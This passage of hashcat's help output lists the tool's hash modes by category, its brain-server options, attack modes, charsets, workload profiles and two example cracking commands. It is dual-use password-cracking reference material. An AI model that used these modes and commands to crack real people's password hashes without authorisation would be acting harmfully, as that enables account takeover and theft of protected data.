     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db
 
- [ Hash modes ] -
 
      # | Name                                                | Category
  ======+=====================================================+======================================
    900 | MD4                                                 | Raw Hash
      0 | MD5                                                 | Raw Hash
    100 | SHA1                                                | Raw Hash
   1300 | SHA2-224                                            | Raw Hash
   1400 | SHA2-256                                            | Raw Hash
  10800 | SHA2-384                                            | Raw Hash
   1700 | SHA2-512                                            | Raw Hash
  17300 | SHA3-224                                            | Raw Hash
  17400 | SHA3-256                                            | Raw Hash
  17500 | SHA3-384                                            | Raw Hash
  17600 | SHA3-512                                            | Raw Hash
   6000 | RIPEMD-160                                          | Raw Hash
    600 | BLAKE2b-512                                         | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian    | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian    | Raw Hash
   6900 | GOST R 34.11-94                                     | Raw Hash
   5100 | Half MD5                                            | Raw Hash
  17700 | Keccak-224                                          | Raw Hash
  17800 | Keccak-256                                          | Raw Hash
  17900 | Keccak-384                                          | Raw Hash
  18000 | Keccak-512                                          | Raw Hash
   6100 | Whirlpool                                           | Raw Hash
  10100 | SipHash                                             | Raw Hash
     70 | md5(utf16le($pass))                                 | Raw Hash
    170 | sha1(utf16le($pass))                                | Raw Hash
   1470 | sha256(utf16le($pass))                              | Raw Hash
  10870 | sha384(utf16le($pass))                              | Raw Hash
   1770 | sha512(utf16le($pass))                              | Raw Hash
     10 | md5($pass.$salt)                                    | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                    | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                              | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                               | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                         | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                         | Raw Hash, Salted and/or Iterated
  21300 | md5($salt.sha1($salt.$pass))                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                           | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                     | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                          | Raw Hash, Salted and/or Iterated
   3500 | md5(md5(md5($pass)))                                | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                    | Raw Hash, Salted and/or Iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))             | Raw Hash, Salted and/or Iterated
  21200 | md5(sha1($salt).md5($pass))                         | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                         | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                           | Raw Hash, Salted and/or Iterated
    110 | sha1($pass.$salt)                                   | Raw Hash, Salted and/or Iterated
    120 | sha1($salt.$pass)                                   | Raw Hash, Salted and/or Iterated
   4900 | sha1($salt.$pass.$salt)                             | Raw Hash, Salted and/or Iterated
   4520 | sha1($salt.sha1($pass))                             | Raw Hash, Salted and/or Iterated
  24300 | sha1($salt.sha1($pass.$salt))                       | Raw Hash, Salted and/or Iterated
    140 | sha1($salt.utf16le($pass))                          | Raw Hash, Salted and/or Iterated
  19300 | sha1($salt1.$pass.$salt2)                           | Raw Hash, Salted and/or Iterated
  14400 | sha1(CX)                                            | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                    | Raw Hash, Salted and/or Iterated
   4710 | sha1(md5($pass).$salt)                              | Raw Hash, Salted and/or Iterated
  21100 | sha1(md5($pass.$salt))                              | Raw Hash, Salted and/or Iterated
  18500 | sha1(md5(md5($pass)))                               | Raw Hash, Salted and/or Iterated
   4500 | sha1(sha1($pass))                                   | Raw Hash, Salted and/or Iterated
   4510 | sha1(sha1($pass).$salt)                             | Raw Hash, Salted and/or Iterated
   5000 | sha1(sha1($salt.$pass.$salt))                       | Raw Hash, Salted and/or Iterated
    130 | sha1(utf16le($pass).$salt)                          | Raw Hash, Salted and/or Iterated
   1410 | sha256($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1420 | sha256($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  22300 | sha256($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
  20720 | sha256($salt.sha256($pass))                         | Raw Hash, Salted and/or Iterated
   1440 | sha256($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  20800 | sha256(md5($pass))                                  | Raw Hash, Salted and/or Iterated
  20710 | sha256(sha256($pass).$salt)                         | Raw Hash, Salted and/or Iterated
  21400 | sha256(sha256_bin($pass))                           | Raw Hash, Salted and/or Iterated
   1430 | sha256(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
  10810 | sha384($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
  10820 | sha384($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  10840 | sha384($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  10830 | sha384(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
   1710 | sha512($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1720 | sha512($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
   1740 | sha512($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   1730 | sha512(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     50 | HMAC-MD5 (key = $pass)                              | Raw Hash, Authenticated
     60 | HMAC-MD5 (key = $salt)                              | Raw Hash, Authenticated
    150 | HMAC-SHA1 (key = $pass)                             | Raw Hash, Authenticated
    160 | HMAC-SHA1 (key = $salt)                             | Raw Hash, Authenticated
   1450 | HMAC-SHA256 (key = $pass)                           | Raw Hash, Authenticated
   1460 | HMAC-SHA256 (key = $salt)                           | Raw Hash, Authenticated
   1750 | HMAC-SHA512 (key = $pass)                           | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                           | Raw Hash, Authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian         | Raw Hash, Authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian         | Raw Hash, Authenticated
  11850 | HMAC-Streebog-512 (key = $pass), big-endian         | Raw Hash, Authenticated
  11860 | HMAC-Streebog-512 (key = $salt), big-endian         | Raw Hash, Authenticated
  11500 | CRC32                                               | Raw Checksum
  18700 | Java Object hashCode()                              | Raw Checksum
  25700 | MurmurHash                                          | Raw Checksum
  14100 | 3DES (PT = $salt, key = $pass)                      | Raw Cipher, Known-Plaintext attack
  14000 | DES (PT = $salt, key = $pass)                       | Raw Cipher, Known-Plaintext attack
  26401 | AES-128-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26402 | AES-192-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26403 | AES-256-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  15400 | ChaCha20                                            | Raw Cipher, Known-Plaintext attack
  14500 | Linux Kernel Crypto API (2.4)                       | Raw Cipher, Known-Plaintext attack
  14900 | Skip32 (PT = $salt, key = $pass)                    | Raw Cipher, Known-Plaintext attack
  11900 | PBKDF2-HMAC-MD5                                     | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                    | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                  | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                  | Generic KDF
   8900 | scrypt                                              | Generic KDF
    400 | phpass                                              | Generic KDF
  16100 | TACACS+                                             | Network Protocols
  11400 | SIP digest authentication (MD5)                     | Network Protocols
   5300 | IKE-PSK MD5                                         | Network Protocols
   5400 | IKE-PSK SHA1                                        | Network Protocols
  25100 | SNMPv3 HMAC-MD5-96                                  | Network Protocols
  25000 | SNMPv3 HMAC-MD5-96/HMAC-SHA1-96                     | Network Protocols
  25200 | SNMPv3 HMAC-SHA1-96                                 | Network Protocols
  26700 | SNMPv3 HMAC-SHA224-128                              | Network Protocols
  26800 | SNMPv3 HMAC-SHA256-192                              | Network Protocols
  26900 | SNMPv3 HMAC-SHA384-256                              | Network Protocols
  27300 | SNMPv3 HMAC-SHA512-384                              | Network Protocols
   2500 | WPA-EAPOL-PBKDF2                                    | Network Protocols
   2501 | WPA-EAPOL-PMK                                       | Network Protocols
  22000 | WPA-PBKDF2-PMKID+EAPOL                              | Network Protocols
  22001 | WPA-PMK-PMKID+EAPOL                                 | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                    | Network Protocols
  16801 | WPA-PMKID-PMK                                       | Network Protocols
   7300 | IPMI2 RAKP HMAC-SHA1                                | Network Protocols
  10200 | CRAM-MD5                                            | Network Protocols
  16500 | JWT (JSON Web Token)                                | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocols
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocols
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocols
   5600 | NetNTLMv2                                           | Network Protocols
  27100 | NetNTLMv2 (NT)                                      | Network Protocols
   4800 | iSCSI CHAP authentication, MD5(CHAP)                | Network Protocols
   8500 | RACF                                                | Operating System
   6300 | AIX {smd5}                                          | Operating System
   6700 | AIX {ssha1}                                         | Operating System
   6400 | AIX {ssha256}                                       | Operating System
   6500 | AIX {ssha512}                                       | Operating System
   3000 | LM                                                  | Operating System
  19000 | QNX /etc/shadow (MD5)                               | Operating System
  19100 | QNX /etc/shadow (SHA256)                            | Operating System
  19200 | QNX /etc/shadow (SHA512)                            | Operating System
  15300 | DPAPI masterkey file v1                             | Operating System
  15900 | DPAPI masterkey file v2                             | Operating System
   7200 | GRUB 2                                              | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                     | Operating System
  12400 | BSDi Crypt, Extended DES                            | Operating System
   1000 | NTLM                                                | Operating System
   9900 | Radmin2                                             | Operating System
   5800 | Samsung Android Password/PIN                        | Operating System
  13800 | Windows Phone 8+ PIN/password                       | Operating System
   2410 | Cisco-ASA MD5                                       | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                       | Operating System
   9300 | Cisco-IOS $9$ (scrypt)                              | Operating System
   5700 | Cisco-IOS type 4 (SHA256)                           | Operating System
   2400 | Cisco-PIX MD5                                       | Operating System
   8100 | Citrix NetScaler (SHA1)                             | Operating System
  22200 | Citrix NetScaler (SHA512)                           | Operating System
   1100 | Domain Cached Credentials (DCC), MS Cache           | Operating System
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2      | Operating System
   7000 | FortiGate (FortiOS)                                 | Operating System
  26300 | FortiGate256 (FortiOS256)                           | Operating System
    125 | ArubaOS                                             | Operating System
    501 | Juniper IVE                                         | Operating System
     22 | Juniper NetScreen/SSG (ScreenOS)                    | Operating System
  15100 | Juniper/NetBSD sha1crypt                            | Operating System
  26500 | iPhone passcode (UID key + System Keybag)           | Operating System
    122 | macOS v10.4, macOS v10.5, macOS v10.6               | Operating System
   1722 | macOS v10.7                                         | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                        | Operating System
   3200 | bcrypt $2*$, Blowfish (Unix)                        | Operating System
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)           | Operating System
   1500 | descrypt, DES (Unix), Traditional DES               | Operating System
   7400 | sha256crypt $5$, SHA256 (Unix)                      | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                      | Operating System
  24600 | SQLCipher                                           | Database Server
    131 | MSSQL (2000)                                        | Database Server
    132 | MSSQL (2005)                                        | Database Server
   1731 | MSSQL (2012, 2014)                                  | Database Server
  24100 | MongoDB ServerKey SCRAM-SHA-1                       | Database Server
  24200 | MongoDB ServerKey SCRAM-SHA-256                     | Database Server
     12 | PostgreSQL                                          | Database Server
  11100 | PostgreSQL CRAM (MD5)                               | Database Server
   3100 | Oracle H: Type (Oracle 7+)                          | Database Server
    112 | Oracle S: Type (Oracle 11+)                         | Database Server
  12300 | Oracle T: Type (Oracle 12+)                         | Database Server
   7401 | MySQL $A$ (sha256crypt)                             | Database Server
  11200 | MySQL CRAM (SHA1)                                   | Database Server
    200 | MySQL323                                            | Database Server
    300 | MySQL4.1/MySQL5                                     | Database Server
   8000 | Sybase ASE                                          | Database Server
   8300 | DNSSEC (NSEC3)                                      | FTP, HTTP, SMTP, LDAP Server
  25900 | KNX IP Secure - Device Authentication Code          | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                    | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256(Base64), LDAP {SSHA256}                    | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                    | FTP, HTTP, SMTP, LDAP Server
  24900 | Dahua Authentication MD5                            | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)             | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server >= 0.9.55                          | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                      | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)               | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x < .NET 4                              | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x >= .NET 4                             | FTP, HTTP, SMTP, LDAP Server
   1421 | hMailServer                                         | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA            | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B (BCODE)                                 | Enterprise Application Software (EAS)
   7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE             | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                            | Enterprise Application Software (EAS)
   7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE        | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1                 | Enterprise Application Software (EAS)
    133 | PeopleSoft                                          | Enterprise Application Software (EAS)
  13500 | PeopleSoft PS_TOKEN                                 | Enterprise Application Software (EAS)
  21500 | SolarWinds Orion                                    | Enterprise Application Software (EAS)
  21501 | SolarWinds Orion v2                                 | Enterprise Application Software (EAS)
     24 | SolarWinds Serv-U                                   | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                                | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                                | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                                | Enterprise Application Software (EAS)
  26200 | OpenEdge Progress Encode                            | Enterprise Application Software (EAS)
  20600 | Oracle Transportation Management (SHA256)           | Enterprise Application Software (EAS)
   4711 | Huawei sha1(md5($pass).$salt)                       | Enterprise Application Software (EAS)
  20711 | AuthMe sha256                                       | Enterprise Application Software (EAS)
  22400 | AES Crypt (SHA256)                                  | Full-Disk Encryption (FDE)
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)         | Full-Disk Encryption (FDE)
  14600 | LUKS                                                | Full-Disk Encryption (FDE)
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
  13751 | VeraCrypt SHA256 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13752 | VeraCrypt SHA256 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13753 | VeraCrypt SHA256 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode          | Full-Disk Encryption (FDE)
  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode         | Full-Disk Encryption (FDE)
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode         | Full-Disk Encryption (FDE)
  13721 | VeraCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13722 | VeraCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13723 | VeraCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13771 | VeraCrypt Streebog-512 + XTS 512 bit                | Full-Disk Encryption (FDE)
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit               | Full-Disk Encryption (FDE)
  13773 | VeraCrypt Streebog-512 + XTS 1536 bit               | Full-Disk Encryption (FDE)
  13781 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
  13782 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
  13783 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
  13731 | VeraCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13732 | VeraCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13733 | VeraCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  23900 | BestCrypt v3 Volume Encryption                      | Full-Disk Encryption (FDE)
  16700 | FileVault 2                                         | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)       | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)       | Full-Disk Encryption (FDE)
  20011 | DiskCryptor SHA512 + XTS 512 bit                    | Full-Disk Encryption (FDE)
  20012 | DiskCryptor SHA512 + XTS 1024 bit                   | Full-Disk Encryption (FDE)
  20013 | DiskCryptor SHA512 + XTS 1536 bit                   | Full-Disk Encryption (FDE)
  22100 | BitLocker                                           | Full-Disk Encryption (FDE)
  12900 | Android FDE (Samsung DEK)                           | Full-Disk Encryption (FDE)
   8800 | Android FDE <= 4.3                                  | Full-Disk Encryption (FDE)
  18300 | Apple File System (APFS)                            | Full-Disk Encryption (FDE)
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
   6221 | TrueCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
   6222 | TrueCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
   6223 | TrueCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
   6231 | TrueCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6232 | TrueCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6233 | TrueCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  12200 | eCryptfs                                            | Full-Disk Encryption (FDE)
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                       | Documents
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1          | Documents
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2          | Documents
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                       | Documents
  25400 | PDF 1.4 - 1.6 (Acrobat 5 - 8) - edit password       | Documents
  10600 | PDF 1.7 Level 3 (Acrobat 9)                         | Documents
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                   | Documents
   9400 | MS Office 2007                                      | Documents
   9500 | MS Office 2010                                      | Documents
   9600 | MS Office 2013                                      | Documents
  25300 | MS Office 2016 - SheetProtection                    | Documents
   9700 | MS Office <= 2003 $0/$1, MD5 + RC4                  | Documents
   9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1     | Documents
   9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2     | Documents
   9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1       | Documents
   9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2       | Documents
   9800 | MS Office <= 2003 $3/$4, SHA1 + RC4                 | Documents
  18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)       | Documents
  18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish)    | Documents
  16200 | Apple Secure Notes                                  | Documents
  23300 | Apple iWork                                         | Documents
   6600 | 1Password, agilekeychain                            | Password Managers
   8200 | 1Password, cloudkeychain                            | Password Managers
   9000 | Password Safe v2                                    | Password Managers
   5200 | Password Safe v3                                    | Password Managers
   6800 | LastPass + LastPass sniffed                         | Password Managers
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Managers
  23400 | Bitwarden                                           | Password Managers
  16900 | Ansible Vault                                       | Password Managers
  26000 | Mozilla key3.db                                     | Password Managers
  26100 | Mozilla key4.db                                     | Password Managers
  23100 | Apple Keychain                                      | Password Managers
  11600 | 7-Zip                                               | Archives
  12500 | RAR3-hp                                             | Archives
  23800 | RAR3-p (Compressed)                                 | Archives
  23700 | RAR3-p (Uncompressed)                               | Archives
  13000 | RAR5                                                | Archives
  17220 | PKZIP (Compressed Multi-File)                       | Archives
  17200 | PKZIP (Compressed)                                  | Archives
  17225 | PKZIP (Mixed Multi-File)                            | Archives
  17230 | PKZIP (Mixed Multi-File Checksum-Only)              | Archives
  17210 | PKZIP (Uncompressed)                                | Archives
  20500 | PKZIP Master Key                                    | Archives
  20510 | PKZIP Master Key (6 byte optimization)              | Archives
  23001 | SecureZIP AES-128                                   | Archives
  23002 | SecureZIP AES-192                                   | Archives
  23003 | SecureZIP AES-256                                   | Archives
  13600 | WinZip                                              | Archives
  18900 | Android Backup                                      | Archives
  24700 | Stuffit5                                            | Archives
  13200 | AxCrypt 1                                           | Archives
  13300 | AxCrypt 1 in-memory SHA1                            | Archives
  23500 | AxCrypt 2 AES-128                                   | Archives
  23600 | AxCrypt 2 AES-256                                   | Archives
  14700 | iTunes backup < 10.0                                | Archives
  14800 | iTunes backup >= 10.0                               | Archives
   8400 | WBB3 (Woltlab Burning Board)                        | Forums, CMS, E-Commerce
   2612 | PHPS                                                | Forums, CMS, E-Commerce
    121 | SMF (Simple Machines Forum) > v1.1                  | Forums, CMS, E-Commerce
   3711 | MediaWiki B type                                    | Forums, CMS, E-Commerce
   4521 | Redmine                                             | Forums, CMS, E-Commerce
  24800 | Umbraco HMAC-SHA1                                   | Forums, CMS, E-Commerce
     11 | Joomla < 2.5.18                                     | Forums, CMS, E-Commerce
  13900 | OpenCart                                            | Forums, CMS, E-Commerce
  11000 | PrestaShop                                          | Forums, CMS, E-Commerce
  16000 | Tripcode                                            | Forums, CMS, E-Commerce
   7900 | Drupal7                                             | Forums, CMS, E-Commerce
   4522 | PunBB                                               | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ (Invision Power Board)             | Forums, CMS, E-Commerce
   2611 | vBulletin < v3.8.5                                  | Forums, CMS, E-Commerce
   2711 | vBulletin >= v3.8.5                                 | Forums, CMS, E-Commerce
  25600 | bcrypt(md5($pass)) / bcryptmd5                      | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                    | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                             | Forums, CMS, E-Commerce
  18100 | TOTP (HMAC-SHA1)                                    | One-Time Passwords
   2000 | STDOUT                                              | Plaintext
  99999 | Plaintext                                           | Plaintext
  21600 | Web2py pbkdf2-sha512                                | Framework
  10000 | Django (PBKDF2-SHA256)                              | Framework
    124 | Django (SHA-1)                                      | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                        | Framework
  19500 | Ruby on Rails Restful-Authentication                | Framework
  27200 | Ruby on Rails Restful Auth (one round, no sitekey)  | Framework
  20200 | Python passlib pbkdf2-sha512                        | Framework
  20300 | Python passlib pbkdf2-sha256                        | Framework
  20400 | Python passlib pbkdf2-sha1                          | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)   | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES) | Private Key
  15500 | JKS Java Key Store Private Keys (SHA1)              | Private Key
  22911 | RSA/DSA/EC/OpenSSH Private Keys ($0$)               | Private Key
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)               | Private Key
  22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)           | Private Key
  22941 | RSA/DSA/EC/OpenSSH Private Keys ($4$)               | Private Key
  22951 | RSA/DSA/EC/OpenSSH Private Keys ($5$)               | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                              | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)       | Instant Messaging Service
  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)    | Instant Messaging Service
  22301 | Telegram Mobile App Passcode (SHA256)               | Instant Messaging Service
     23 | Skype                                               | Instant Messaging Service
  26600 | MetaMask Wallet                                     | Cryptocurrency Wallet
  21000 | BitShares v0.x - sha512(sha512_bin(pass))           | Cryptocurrency Wallet
  11300 | Bitcoin/Litecoin wallet.dat                         | Cryptocurrency Wallet
  16600 | Electrum Wallet (Salt-Type 1-3)                     | Cryptocurrency Wallet
  21700 | Electrum Wallet (Salt-Type 4)                       | Cryptocurrency Wallet
  21800 | Electrum Wallet (Salt-Type 5)                       | Cryptocurrency Wallet
  12700 | Blockchain, My Wallet                               | Cryptocurrency Wallet
  15200 | Blockchain, My Wallet, V2                           | Cryptocurrency Wallet
  18800 | Blockchain, My Wallet, Second Password (SHA256)     | Cryptocurrency Wallet
  25500 | Stargazer Stellar Wallet XLM                        | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256        | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                 | Cryptocurrency Wallet
  15700 | Ethereum Wallet, SCRYPT                             | Cryptocurrency Wallet
  22500 | MultiBit Classic .key (MD5)                         | Cryptocurrency Wallet
  22700 | MultiBit HD (scrypt)                                | Cryptocurrency Wallet
 
- [ Brain Client Features ] -
 
  # | Features
 ===+========
  1 | Send hashed passwords
  2 | Send attack positions
  3 | Send hashed passwords and attack positions
 
- [ Outfile Formats ] -
 
  # | Format
 ===+========
  1 | hash[:salt]
  2 | plain
  3 | hex_plain
  4 | crack_pos
  5 | timestamp absolute
  6 | timestamp relative
 
- [ Rule Debugging Modes ] -
 
  # | Format
 ===+========
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word
 
- [ Attack Modes ] -
 
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  9 | Association
 
- [ Built-in Charsets ] -
 
  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
  d | 0123456789                 [0-9]
  h | 0123456789abcdef           [0-9a-f]
  H | 0123456789ABCDEF           [0-9A-F]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff
 
- [ OpenCL Device Types ] -
 
  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor
 
- [ Workload Profiles ] -
 
  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless
 
- [ License ] -
 
  hashcat is licensed under the MIT license
  Copyright and license terms are listed in docs/license.txt
 
- [ Basic Examples ] -
 
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
